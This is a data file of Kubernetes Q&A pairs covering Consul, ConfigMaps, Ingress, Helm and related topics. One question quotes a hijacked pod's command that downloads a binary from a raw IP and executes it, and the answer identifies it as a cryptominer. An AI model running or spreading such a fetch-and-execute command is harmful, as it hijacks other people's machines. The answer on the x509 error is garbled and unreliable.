prompt
stringlengths 65
38.7k
| response
stringlengths 41
29.1k
|
---|---|
<p>We have installed consul through helm charts on k8 cluster. Here, I have deployed one consul server and the rest are consul agents.</p>
<pre><code>kubectl get pods
NAME READY STATUS RESTARTS AGE
consul-7csp9 1/1 Running 0 4h
consul-connect-injector-webhook-deployment-66d46867f6-wqtt7 1/1 Running 0 4h
consul-server-0 1/1 Running 0 4h
consul-sync-catalog-85f5654b89-9qblx 1/1 Running 0 4h
consul-x4mqq 1/1 Running 0 4h
</code></pre>
<p>We see that the nodes are registered onto the Consul Server. <a href="http://XX.XX.XX.XX/ui/kube/nodes" rel="nofollow noreferrer">http://XX.XX.XX.XX/ui/kube/nodes</a></p>
<p>We have deployed an hello world application onto k8 cluster. This will bring-up Hello-World </p>
<pre><code>kubectl get pods
NAME READY STATUS RESTARTS AGE
consul-7csp9 1/1 Running 0 4h
consul-connect-injector-webhook-deployment-66d46867f6-wqtt7 1/1 Running 0 4h
consul-server-0 1/1 Running 0 4h
consul-sync-catalog-85f5654b89-9qblx 1/1 Running 0 4h
consul-x4mqq 1/1 Running 0 4h
sampleapp-69bf9f84-ms55k 2/2 Running 0 4h
</code></pre>
<p>Below is the yaml file.</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: sampleapp
spec:
replicas: 1
selector:
matchLabels:
app: sampleapp
template:
metadata:
labels:
app: sampleapp
annotations:
"consul.hashicorp.com/connect-inject": "true"
spec:
containers:
- name: sampleapp
image: "docker-dev-repo.aws.com/sampleapp-java/helloworld-service:a8c9f65-65"
ports:
- containerPort: 8080
name: http
</code></pre>
<p>Successful deployment of sampleapp, I see that sampleapp-proxy is registered in consul. and sampleapp-proxy is listed in kubernetes services. (This is because the toConsul and toK8S are passed as true during installation)</p>
<pre><code>kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
consul ExternalName <none> consul.service.test <none> 4h
consul-connect-injector-svc ClusterIP XX.XX.XX.XX <none> 443/TCP 4h
consul-dns ClusterIP XX.XX.XX.XX <none> 53/TCP,53/UDP 4h
consul-server ClusterIP None <none> 8500/TCP,8301/TCP,8301/UDP,8302/TCP,8302/UDP,8300/TCP,8600/TCP,8600/UDP 4h
consul-ui LoadBalancer XX.XX.XX.XX XX.XX.XX.XX 80:32648/TCP 4h
dns-test-proxy ExternalName <none> dns-test-proxy.service.test <none> 2h
fluentd-gcp-proxy ExternalName <none> fluentd-gcp-proxy.service.test <none> 33m
kubernetes ClusterIP XX.XX.XX.XX <none> 443/TCP 5d
sampleapp-proxy ExternalName <none> sampleapp-proxy.service.test <none> 4h
</code></pre>
<p>How can I access my sampleapp? Should I expose my application as kube service again? </p>
<p>Earlier, without consul, we used a create a service for the sampleapp and expose the service as ingress. Using the Ingress Loadbalancer, we used to access our application. </p>
| <p>Consul does not provide any new ways to expose your apps. You need to create ingress Loadbalancer as before.</p>
|
<p>I am having two different config maps <strong>test-configmap</strong> and <strong>common-config</strong>. I tried to mount them at the same location, but one config map overwrote the other. Then I read about <code>subPath</code> and did not work.</p>
<p>deploy.yaml</p>
<pre><code>apiVersion: apps/v1beta1 # for versions before 1.8.0 use apps/v1beta1
kind: Deployment
metadata:
name: testing
spec:
replicas: 1
template:
metadata:
name: testing
labels:
app: testing
spec:
containers:
- name: testing-container
image: testing
imagePullPolicy: IfNotPresent
ports:
- containerPort: __PORT__
volumeMounts:
- name: commonconfig-volume
mountPath: /usr/src/app/config/test.config
subPath: test.config
volumes:
- name: commonconfig-volume
configMap:
name: test-configmap
- name: commonconfig-volume
configMap:
name: common-config
</code></pre>
<p>Error :</p>
<p><code>The Deployment "testing" is invalid: spec.template.spec.volumes[1].name: Duplicate value: "commonconfig-volume"</code></p>
<p>I am not sure if merging two config map achievable of not. And if yes then how should I do it.</p>
| <p>You have to use special <a href="https://kubernetes.io/docs/concepts/storage/volumes/#projected" rel="noreferrer">projected</a> volumes for achieve that. Example your deployment:</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: testing
spec:
replicas: 1
selector:
matchLabels:
app: testing
template:
metadata:
name: testing
labels:
app: testing
spec:
containers:
- name: testing-container
image: testing
imagePullPolicy: IfNotPresent
ports:
- containerPort: __PORT__
volumeMounts:
- name: commonconfig-volume
mountPath: /usr/src/app/config
volumes:
- name: commonconfig-volume
projected:
sources:
- configMap:
name: test-configmap
- configMap:
name: common-config
</code></pre>
<p>You can use <code>secret</code> same as <code>configMap</code></p>
|
<p>Currently I am doing deployment and creating a service with type loadbalancer. I can access the POD via the created ELB. Then using route 53 I am attaching the ELB with k8-test.abc.com using alias. Below is the snippet.</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: %APP_FULL_NAME%-service-lb-http
labels:
appname: %APP_FULL_NAME%
stage: %APP_ENV%
component: app-kube-aws-elb
annotations:
service.beta.kubernetes.io/aws-load-balancer-cross-zone-load-balancing-enabled: "True"
service.beta.kubernetes.io/aws-load-balancer-ssl-cert: arn:aws:acm:us-east-1:XXXXXXXXXXXXX:certificate/XXXXXXXXXXXXXXX
service.beta.kubernetes.io/aws-load-balancer-backend-protocol: http
spec:
type: LoadBalancer
ports:
- name: http
port: 443
targetPort: 8080
protocol: TCP
selector:
appname: %APP_FULL_NAME%
stage: %APP_ENV%
</code></pre>
<p>But I was wondering is there any way by which I can do some changes on deployment and the ELB which will be created, automatically get attached to the k8-test.abc.com while creating. </p>
| <p>There is an Incubator project (read: you may use it, but don't complain if it breaks) called <a href="https://github.com/kubernetes-incubator/external-dns" rel="nofollow noreferrer">external-dns</a>. I haven't used it myself, but it looks like it may do what you ask for. Among other DNS providers, it also offers support for Route53.</p>
<p>After set-up (here's <a href="https://github.com/kubernetes-incubator/external-dns/blob/master/docs/tutorials/aws.md" rel="nofollow noreferrer">the documentation on how to set-up <em>external-dns</em> on AWS</a>), you can define a DNS name for a Service using the <code>external-dns.alpha.kubernetes.io/hostname</code> annotation:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: %APP_FULL_NAME%-service-lb-http
labels:
appname: %APP_FULL_NAME%
stage: %APP_ENV%
component: app-kube-aws-elb
annotations:
external-dns.alpha.kubernetes.io/hostname: k8-test.abc.com
service.beta.kubernetes.io/aws-load-balancer-cross-zone-load-balancing-enabled: "True"
service.beta.kubernetes.io/aws-load-balancer-ssl-cert: arn:aws:acm:us-east-1:XXXXXXXXXXXXX:certificate/XXXXXXXXXXXXXXX
service.beta.kubernetes.io/aws-load-balancer-backend-protocol: http
spec:
type: LoadBalancer
ports:
- name: http
port: 443
targetPort: 8080
protocol: TCP
selector:
appname: %APP_FULL_NAME%
stage: %APP_ENV%
</code></pre>
<p>This will automatically create the respective DNS records that will alias the DNS name <code>k8-test-abc.com</code> to your ELB.</p>
|
<p>So I got a running cluster on my server. The server is running <code>ubuntu 18.06</code>. <strong>I set up the cluster using <code>kubeadm</code>, <code>kubectl</code> and <code>kubelet</code>.</strong></p>
<p><strong>My goal in a nutshell: I want to reach the services with executing <code>http://myserver.com/service</code>.</strong></p>
<p>I am kinda lost with exposing the services to port 8080. The current structure is like this:</p>
<blockquote>
<p>31001:SERVICE:8080 -> 8080:POD</p>
</blockquote>
<p>So I need to redirect the requests incoming using <code>http://myserver.com/service</code> to the <code>kubernetes service</code> with port 31001.</p>
<p>Current situation: I can only access the cluster via server IP:6443. All pods, services and so forth are up and running.</p>
<p><strong>So my question: how can I make the services more or less public available on port 8080?</strong></p>
<p>As requested below:</p>
<blockquote>
<p>Output of <code>kubectl get all --all-namespaces -o wide</code></p>
</blockquote>
<pre><code>NAMESPACE NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
default pod/articleservice-deployment-6d48989664-jbzs6 1/1 Running 0 5h56m 192.168.0.4 server.address.com <none> <none>
default pod/cartservice-deployment-6b844f45b8-jz45h 1/1 Running 0 5h56m 192.168.0.5 server.address.com <none> <none>
default pod/catalogservice-deployment-d4bd6984c-6qlqg 1/1 Running 0 5h56m 192.168.0.6 server.address.com <none> <none>
default pod/customerservice-deployment-7d6f77fdbb-p42xj 1/1 Running 0 5h56m 192.168.0.7 server.address.com <none> <none>
kube-system pod/calico-node-5rl9m 2/2 Running 0 5h58m 999.999.99.99 server.address.com <none> <none>
kube-system pod/coredns-86c58d9df4-h64fg 1/1 Running 0 6h10m 192.168.0.2 server.address.com <none> <none>
kube-system pod/coredns-86c58d9df4-pwfj4 1/1 Running 0 6h10m 192.168.0.3 server.address.com <none> <none>
kube-system pod/etcd-server.address.net 1/1 Running 0 6h9m 999.999.99.99 server.address.com <none> <none>
kube-system pod/kube-apiserver-server.address.net 1/1 Running 0 6h10m 999.999.99.99 server.address.com <none> <none>
kube-system pod/kube-controller-manager-server.address.net 1/1 Running 0 6h9m 999.999.99.99 server.address.com <none> <none>
kube-system pod/kube-proxy-xb2qc 1/1 Running 0 6h10m 999.999.99.99 server.address.com <none> <none>
kube-system pod/kube-scheduler-server.address.net 1/1 Running 0 6h9m 999.999.99.99 server.address.com <none> <none>
NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR
default service/articleservice NodePort 10.97.125.155 <none> 31001:31001/TCP,5005:32001/TCP 5h57m app=articleservice
default service/cartservice NodePort 10.99.42.169 <none> 31002:31002/TCP,5005:32002/TCP 5h57m app=cartservice
default service/catalogservice NodePort 10.106.101.93 <none> 31003:31003/TCP,5005:32003/TCP 5h57m app=catalogservice
default service/customerservice NodePort 10.106.2.159 <none> 31004:31004/TCP,5005:32004/TCP 5h57m app=customerservice
default service/kubernetes ClusterIP 10.96.0.1 <none> 443/TCP 6h11m <none>
kube-system service/calico-typha ClusterIP 10.96.242.31 <none> 5473/TCP 5h58m k8s-app=calico-typha
kube-system service/kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP 6h11m k8s-app=kube-dns
NAMESPACE NAME DESIRED CURRENT READY UP-TO-DATE AVAILABLE NODE SELECTOR AGE CONTAINERS IMAGES SELECTOR
kube-system daemonset.apps/calico-node 1 1 1 1 1 beta.kubernetes.io/os=linux 5h58m calico-node,install-cni quay.io/calico/node:v3.3.2,quay.io/calico/cni:v3.3.2 k8s-app=calico-node
kube-system daemonset.apps/kube-proxy 1 1 1 1 1 <none> 6h11m kube-proxy k8s.gcr.io/kube-proxy:v1.13.1 k8s-app=kube-proxy
NAMESPACE NAME READY UP-TO-DATE AVAILABLE AGE CONTAINERS IMAGES SELECTOR
default deployment.apps/articleservice-deployment 1/1 1 1 5h56m articleservice elps/articleservice:1.0.7 app=articleservice
default deployment.apps/cartservice-deployment 1/1 1 1 5h56m cartservice elps/cartservice:1.0.7 app=cartservice
default deployment.apps/catalogservice-deployment 1/1 1 1 5h56m catalogservice elps/catalogservice:1.0.7 app=catalogservice
default deployment.apps/customerservice-deployment 1/1 1 1 5h56m customerservice elps/customerservice:1.0.7 app=customerservice
kube-system deployment.apps/calico-typha 0/0 0 0 5h58m calico-typha quay.io/calico/typha:v3.3.2 k8s-app=calico-typha
kube-system deployment.apps/coredns 2/2 2 2 6h11m coredns k8s.gcr.io/coredns:1.2.6 k8s-app=kube-dns
NAMESPACE NAME DESIRED CURRENT READY AGE CONTAINERS IMAGES SELECTOR
default replicaset.apps/articleservice-deployment-6d48989664 1 1 1 5h56m articleservice elps/articleservice:1.0.7 app=articleservice,pod-template-hash=6d48989664
default replicaset.apps/cartservice-deployment-6b844f45b8 1 1 1 5h56m cartservice elps/cartservice:1.0.7 app=cartservice,pod-template-hash=6b844f45b8
default replicaset.apps/catalogservice-deployment-d4bd6984c 1 1 1 5h56m catalogservice elps/catalogservice:1.0.7 app=catalogservice,pod-template-hash=d4bd6984c
default replicaset.apps/customerservice-deployment-7d6f77fdbb 1 1 1 5h56m customerservice elps/customerservice:1.0.7 app=customerservice,pod-template-hash=7d6f77fdbb
kube-system replicaset.apps/calico-typha-5fc4874c76 0 0 0 5h58m calico-typha quay.io/calico/typha:v3.3.2 k8s-app=calico-typha,pod-template-hash=5fc4874c76
kube-system replicaset.apps/coredns-86c58d9df4 2 2 2 6h10m coredns k8s.gcr.io/coredns:1.2.6 k8s-app=kube-dns,pod-template-hash=86c58d9df4
</code></pre>
| <p><code>Ingress</code> is that you need. This is how it works:</p>
<pre><code> internet
|
[ Ingress ]
--|-----|--
[ Services ]
</code></pre>
<p>Let's say you have any k8s Deployment with the label: <code>app: deployment-01</code> with <code>containerPort: 8888</code></p>
<p>So, you need to create:</p>
<ol>
<li>Service (say service-01)</li>
<li>Ingress (say ingress-01)</li>
</ol>
<p>If you want to reach service-01 by link <a href="http://myserver.com/service" rel="nofollow noreferrer">http://myserver.com/service</a> then your Service YAML should look like this:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: service-01
spec:
selector:
app: deployment-01
ports:
- name: web
protocol: TCP
port: 8080
targetPort: 8888
</code></pre>
<p>and Ingress:</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: ingress-01
annotations:
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: myserver.com
http:
paths:
- path: /service
backend:
serviceName: service-01
servicePort: 8080
</code></pre>
<p>that's it!</p>
<blockquote>
<p>Note: This assumes that you have already deployed the Ingress
controller and it is working.</p>
</blockquote>
|
<p>I have a couple of client applications. For each one I have a build pipeline that gets latest code, compiles it and plots the result to a <code>dist</code> folder (containing only html and js files).</p>
<p>These <code>dist</code> folders are synced, using docker volume, to a web server (<code>nginx</code>) container which actually hosts the client application.</p>
<p>The result is that my client is always "up" and I only need to update the <code>dist</code> folder of any client to deploy it, and never need to mess with the web server container.</p>
<p>However, I want to move my deployment to a different approach, of only building the docker images on pipelines (code change) and using them on demand whenever deploying an environment.</p>
<p>The problem would be how to build the web server container while I don't want to rebuild all clients on any change, nor do I want to store the built output in source control. What would be the best approach?</p>
| <p>You could consider a <a href="https://docs.docker.com/develop/develop-images/multistage-build/" rel="nofollow noreferrer">multi-stage build</a> with:</p>
<ul>
<li>the first stage being the build of your web server (which never change, so it is cached)</li>
<li>the second stage being the build of your dist folder, to which image you add the web server of the first stage.</li>
</ul>
<p>The end result is an image with both the web server and the static files to serve (instead of those files being in a volume), with only the static files being rebuilt.</p>
|
<p>My k8s's default namespace add an rc i din't know, it starts 10 pods automatically. and i don't know why.</p>
<p>My k8s version is:</p>
<pre><code>kubectl version
Client Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:34:11Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"8", GitVersion:"v1.8.6", GitCommit:"6260bb08c46c31eea6cb538b34a9ceb3e406689c", GitTreeState:"clean", BuildDate:"2017-12-21T06:23:29Z", GoVersion:"go1.8.3", Compiler:"gc", Platform:"linux/amd64"}
</code></pre>
<p>And, the pods looks like this:
kubectl get po --namespace=default</p>
<pre><code>NAME READY STATUS RESTARTS AGE
mi125yap1 0/1 ImagePullBackOff 0 1d
y1ee114-2hmp4 0/1 ContainerCreating 0 5h
y1ee114-4hqg4 0/1 ImagePullBackOff 0 5h
y1ee114-5tcb5 0/1 ContainerCreating 0 5h
y1ee114-8ft9x 1/1 Running 0 5h
y1ee114-b9bjn 0/1 ImagePullBackOff 0 5h
y1ee114-ptw9g 0/1 ImagePullBackOff 0 5h
y1ee114-rxl4m 0/1 ImagePullBackOff 0 5h
y1ee114-tn9zw 0/1 ImagePullBackOff 0 5h
y1ee114-tx99w 1/1 Running 0 5h
y1ee114-z9b4m 0/1 ImagePullBackOff 0 5h
</code></pre>
<p>The two master node with public net it start succesfully, but the node with out access to public net fiald:ImagePullBackOff.</p>
<p>One detail of the pod is:</p>
<pre><code>kubectl describe po y1ee114-8ft9x --namespace=default
Name: y1ee114-8ft9x
Namespace: default
Node: server2/172.17.0.102
Start Time: Wed, 26 Dec 2018 05:35:15 +0800
Labels: app=myresd01
Annotations: kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicationController","namespace":"default","name":"y1ee114","uid":"f7ec0108-088c-11e9-856f-00163e160da9"...
Status: Running
IP: 10.1.42.2
Created By: ReplicationController/y1ee114
Controlled By: ReplicationController/y1ee114
Containers:
myresd01:
Container ID: docker://0b237f7e6c2b359dc1227cfdd1b726e6f6bb5346bcca129ec6a5b15336e13b25
Image: centos
Image ID: docker-pullable://centos@sha256:184e5f35598e333bfa7de10d8fb1cebb5ee4df5bc0f970bf2b1e7c7345136426
Port: <none>
Command:
sh
-c
curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json
State: Running
Started: Wed, 26 Dec 2018 05:35:20 +0800
Ready: True
Restart Count: 0
Environment: <none>
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-5xcgh (ro)
Conditions:
Type Status
Initialized True
Ready True
PodScheduled True
Volumes:
shared-data:
Type: EmptyDir (a temporary directory that shares a pod's lifetime)
Medium:
default-token-5xcgh:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-5xcgh
Optional: false
QoS Class: BestEffort
Node-Selectors: <none>
Tolerations: <none>
Events: <none>
</code></pre>
<p>And some of logs is:</p>
<pre><code>[2018-12-26 02:46:18] accepted (870/0) diff 2000 (245 ms)
[2018-12-26 02:46:23] accepted (871/0) diff 2000 (246 ms)
[2018-12-26 02:46:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:46:51] accepted (872/0) diff 2000 (248 ms)
[2018-12-26 02:47:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:47:46] accepted (873/0) diff 2000 (245 ms)
[2018-12-26 02:47:49] accepted (874/0) diff 2000 (245 ms)
[2018-12-26 02:47:56] accepted (875/0) diff 2000 (247 ms)
[2018-12-26 02:48:10] accepted (876/0) diff 2000 (391 ms)
[2018-12-26 02:48:18] accepted (877/0) diff 2000 (245 ms)
[2018-12-26 02:48:20] accepted (878/0) diff 2000 (245 ms)
[2018-12-26 02:48:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:48:37] accepted (879/0) diff 2000 (246 ms)
[2018-12-26 02:48:39] accepted (880/0) diff 2000 (245 ms)
[2018-12-26 02:49:00] accepted (881/0) diff 2000 (245 ms)
[2018-12-26 02:49:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:49:39] accepted (882/0) diff 2000 (245 ms)
[2018-12-26 02:50:27] speed 10s/60s/15m 94.3 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:01] accepted (883/0) diff 2000 (245 ms)
[2018-12-26 02:51:27] speed 10s/60s/15m 94.4 94.3 94.3 H/s max 94.6 H/s
[2018-12-26 02:51:27] accepted (884/0) diff 2000 (248 ms)
</code></pre>
<p>Who know who create this rc and what this for?</p>
| <p>Those are cryptocurrency miners. My guess is your cluster was hacked via the Kubernetes websocket upgrade CVE (<a href="https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/" rel="nofollow noreferrer">https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/</a>). I would probably destroy and recreate your cluster.</p>
<p>I figured this out by downloading <a href="http://192.99.142.232:8220/tte2" rel="nofollow noreferrer">http://192.99.142.232:8220/tte2</a> which was mentioned in the config of your describe output and discovered it was an ELF binary. I ran <code>strings</code> on the binary and after some scrolling found a bunch of strings referring to "cryptonight" which is cryptocurrency mining software.</p>
|
<p>I have a load balanced deployment of spring boot service A, say on a 3 node kubernetes cluster.</p>
<p>I also have a requirement to enable quick configuration management without needing to rebuild+deploy a full blown rebaked image.</p>
<p>For that I put together a spring boot config-server, as well as implemented the Actuator restart on service A which when calling its /restart endpoint on a local single instance deployment it refreshes and loads with the properties fetched from the config-server.</p>
<p>So far so good, but...</p>
<p>How can the above be achieved when service A is deployed on a larger scale k8s deployment with 3, 30 or 300 instances of service A?</p>
<p>Calling /refresh endpoint must be handled by the load balancer as any other REST call on the cluster, meaning it is routed to one of the service instances.</p>
<p>Is there a standard way in springboot-on-k8s I can call each service instance ignoring the LB?</p>
| <p>We don't really use the actuator's restart, instead what we do is, utilize the rollingUpdate strategy of deployment. When we want to "restart" the pods, we issue a kubectl patch. </p>
<pre><code>kubectl patch deployment web -p "{\"spec\":{\"template\":{\"metadata\":{\"labels\":{\"date\":\"`date +'%s'`\"}}}}}"
</code></pre>
<p>A good documentation of the upgrade strategy. </p>
<p><a href="https://www.google.com/url?sa=t&source=web&rct=j&url=https://medium.com/platformer-blog/enable-rolling-updates-in-kubernetes-with-zero-downtime-31d7ec388c81&ved=2ahUKEwjIqtbW_bvfAhUKRY8KHas6DEkQjjgwAnoECAkQAQ&usg=AOvVaw3HjD4CUoG4ma3HWxquaYjp&cshid=1545776336374" rel="nofollow noreferrer">https://www.google.com/url?sa=t&source=web&rct=j&url=https://medium.com/platformer-blog/enable-rolling-updates-in-kubernetes-with-zero-downtime-31d7ec388c81&ved=2ahUKEwjIqtbW_bvfAhUKRY8KHas6DEkQjjgwAnoECAkQAQ&usg=AOvVaw3HjD4CUoG4ma3HWxquaYjp&cshid=1545776336374</a></p>
|
<p>I upgraded my EKS cluster to v1.11.5 from v.1.10.3, but it's giving me <code>x509: cannot validate certificate for <WORKER_IP> because it doesn't contain any IP SANs</code> error when i try to get logs or <code>helm ls</code> on it. Other commands like <code>kubectl get nodes</code> are working fine.</p>
<p>For the upgrade, I clicked "Upgrade cluster" button on the web console, and modified cloudformation template for workers to use latest AWS provided ami (ami-0a9006fb385703b54). read this <a href="https://docs.aws.amazon.com/eks/latest/userguide/update-cluster.html" rel="nofollow noreferrer">guide from AWS</a>, <a href="https://docs.aws.amazon.com/ko_kr/eks/latest/userguide/update-stack.html" rel="nofollow noreferrer">including this</a>.</p>
<p>My cluster was completely unuseable so I rollbacked my worker nodes with old ami (ami-0c7a4976cb6fafd3a) for now, and the error is gone. </p>
<p>I'm really not sure that what i missed. Anyone experiencing similar issue with me? I need help.</p>
<p>Thanks.</p>
| <p>x509 is token authentication and authorisation way in kubernetes may be some that type of problem is there auth related. </p>
|
<p>We have multiple(20+) services running inside docker containers which are being managed using Kubernetes. These services include databases, streaming pipelines and custom applications. We want to make this product available as an on-premises solution so that it can be easily installed, like a <em>one-click</em> installation sort of thing, hiding all the complexity of the infrastructure.</p>
<p>What would be the best way of doing this? Currently we have scripts managing this but as we move into production there will be frequent upgrades and it will become more and more complex to manage all the dependencies.</p>
<p>I am currently looking into <strong>helm</strong> and am wondering if I am exploring in the right direction. Any guidance will be really helpful to me. Thanks.</p>
| <p>Helm seems like the way to go, but what you need to think about in my opinion is more about how will you deliver updates to your software. For example, will you provide a single 'version' of your whole stack, that translates into particular composition of infra setup and microservice versions, or will you allow your customers to upgrade single microservices as they are released. You can have one huge helm chart for everything, or you can use, like I do in most cases, an "umbrella" chart. It contains subcharts for all microservices etc.</p>
<p>My usual setup contains a subchart for every service, then services names are correctly namespaced, so they can be referenced within as <code>.Release.Name-subchart[-optional]</code>. Also, when I need to upgrade, I just upgraed whole chart with something like <code>--reuse-values --set subchart.image.tag=v1.x.x</code> which gives granular control over each service version. I also gate each subcharts resources with <code>if .Values.enabled</code> so I can individualy enabe/diable each subcharts resources.</p>
<p>The ugly side of this, is that if you do want to release single service upgrade, you still need to run the whole umbrella chart, leaving more surface for some kind of error, but on the other hand it gives this capability to deploy whole solution in one command (the default tags are <code>:latest</code> so clean install will always install latest versions published, and then get updated with tagged releases)</p>
|
<p>I have been trying to diagnose a problem that just started a few days ago. </p>
<p>Running <code>kubelet</code>, <code>kubeadm</code> version 1.13.1. Cluster has 5 nodes and had been fine for months until late last week. Running this on a RHEL 7.x box with adequate free resources.</p>
<p>Having an odd issue that the cluster resources (api, scheduler, etcd) become unavailable. This eventually corrects itself and the cluster comes back for a while again.</p>
<p>If I do a <code>sudo systemctl restart kubelet</code> everything within the cluster works fine again, until the intermittent oddness occurs.</p>
<p>I am monitoring the <code>journactl</code> logs to see what is going on when this occurs, and the chunk that stands out is:</p>
<pre><code>Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: 2018-12-26 21:28:06.762004 I | etcdserver: skipped leadership transfer for single member cluster
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.763648 1 reflector.go:270] k8s.io/client-go/informers/factory.go:132: watch of *v1beta1.Event ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.762788 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.762910 1 reflector.go:270] storage/cacher.go:/podsecuritypolicy: watch of *policy.PodSecurityPolicy ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.763149 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.763232 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.763439 1 reflector.go:270] storage/cacher.go:/apiregistration.k8s.io/apiservices: watch of *apiregistration.APIService ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.763719 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.763786 1 reflector.go:270] storage/cacher.go:/daemonsets: watch of *apps.DaemonSet ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.763937 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.764016 1 reflector.go:270] storage/cacher.go:/cronjobs: watch of *batch.CronJob ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.764250 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.764324 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.764386 1 reflector.go:270] storage/cacher.go:/services/endpoints: watch of *core.Endpoints ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.764440 1 reflector.go:270] storage/cacher.go:/deployments: watch of *apps.Deployment ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: WARNING: 2018/12/26 21:28:06 grpc: addrConn.transportMonitor exits due to: context canceled
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: 2018-12-26 21:28:06.765201 W | etcdserver/api/v3rpc: failed to receive watch request from gRPC stream ("rpc error: code = Unavailable desc = body closed by handler")
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: 2018-12-26 21:28:06.765384 W | etcdserver/api/v3rpc: failed to receive watch request from gRPC stream ("rpc error: code = Unavailable desc = body closed by handler")
</code></pre>
<p>...</p>
<pre><code>Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.784805 1 reflector.go:270] storage/cacher.go:/controllerrevisions: watch of *apps.ControllerRevision ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.784871 1 reflector.go:270] storage/cacher.go:/pods: watch of *core.Pod ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.786587 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.786700 1 reflector.go:270] storage/cacher.go:/horizontalpodautoscalers: watch of *autoscaling.HorizontalPodAutoscaler ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.788274 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.788385 1 reflector.go:270] storage/cacher.go:/crd.projectcalico.org/clusterinformations: watch of *unstructured.Unstructured ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
